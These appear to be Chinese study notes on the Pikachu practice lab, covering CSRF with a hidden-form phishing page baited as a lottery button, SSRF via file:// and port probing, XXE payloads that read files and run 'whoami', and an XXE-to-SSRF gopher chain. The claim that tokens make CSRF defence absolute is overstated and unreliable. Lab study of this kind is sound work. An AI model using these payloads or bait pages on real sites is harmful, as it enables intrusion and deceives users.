CSRF(跨站请求伪造)
可以欺骗用户进行点击,一旦用户点击了,攻击完成
CSRF和XSS区别:
CSRF类似于钓鱼链接,是欺骗用户,借助用户权限攻击,但是没有拿到用户权限
而XSS是直接获取cookie,拿到用户权限
pikachu靶场例题:(借助burpsuite)
GET型CSRF
1.先在提示中随便登录一个用户
2.进入修改个人信息 测试:修改手机为999999
3.burp抓包 然后点submit
GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=999999&add=usa&email=lili%40pikachu.com&submit=submit HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.phpCookie: PHPSESSID=g8toc7kvnqeovdiuso1at99c00Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1
4.组合钓鱼网站地址然后诱导用户点击 即可实现相应的修改操作
http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=999999&add=usa&email=lili%40pikachu.com&submit=submit
POST型CSRF
1.同理先登录相应的账号
2.进入修改界面 本次测试修改住址:hahahaha
3.点击提交 burp抓包
POST /pikachu/vul/csrf/csrfpost/csrf_post_edit.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 76Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.phpCookie: PHPSESSID=n3bfqjtr5qapp4dv0j1ae8j5h6Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1sex=girl&phonenum=999999&add=hahahaha&email=lili%40pikachu.com&submit=submit
4.写一个html的钓鱼网站 由于是POST型 所以可以通过表单的方式把参数传进来
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title></head><body><form method="POST" action="http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php"><input type="hidden" name="sex" value="boy"/><input type="hidden" name="phonenum" value="9999"/><input type="hidden" name="add" value="usa"/><input type="hidden" name="email" value="lili%40pikachu.com"/><input type="submit" name="submit" value="点我抽奖"></form></body></html>
CSRF Token
CSRF漏洞主要用来欺骗用户点击,如果使用token可以很大程度防御csrf
专业方法:通过flask框架写一个python的网站 和burpsuite同样的原理去每次抓token然后使用!成本太高!
Token不一定可以防御住所有的暴力破解
但是绝对可以防御住CSRF
CSRF加了token就是绝对防御 就没有办法做这个实验了
SSRF
SSRF(Server-Side Request Forgery:服务器端请求伪造)其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据数据流:攻击者----->服务器---->目标地址根据后台使用的函数的不同,对应的影响和利用方法又有不一样PHP中下面函数的使用不当会导致SSRF:file_get_contents()fsockopen()curl_exec()如果一定要通过后台服务器远程去对用户指定("或者预埋在前端的请求")的地址进行资源请求,则请做好目标地址的过滤。
curl系列的函数,让php代码可以去访问其他人
url=file:///c:/a.txt
url=127.0.0.1:3306 可以变相的把对方服务器当做一个端口扫描器
XXE
XXE -"xml external entity injection"
既"xml外部实体注入漏洞"。
概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。
现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。
以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。
本章提供的案例中,为了模拟漏洞,通过手动指定LIBXML_NOENT选项开启了xml外部实体解析。
条件: php.ini 修改 把前面的分号删除掉
always_populate_raw_post_data = -1<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///d:/a.txt" >]>
<user>
<username>&xxe;</username>
<password>b</password>
</user><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "expect://whoami" >]>
<user>
<username>&xxe;</username>
<password>b</password>
</user>
XXE+SSRF
xxe漏洞出现的地方,已经触发漏洞的,整个数据包,url-encode2次,复制
打开ssrf漏洞出现的地方
url=gopher://xxe.com:80/_[一堆刚刚url-encode过的东西]
gopher
信息查找,tcp/ip,可以做tcp数据流的事情
2083
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
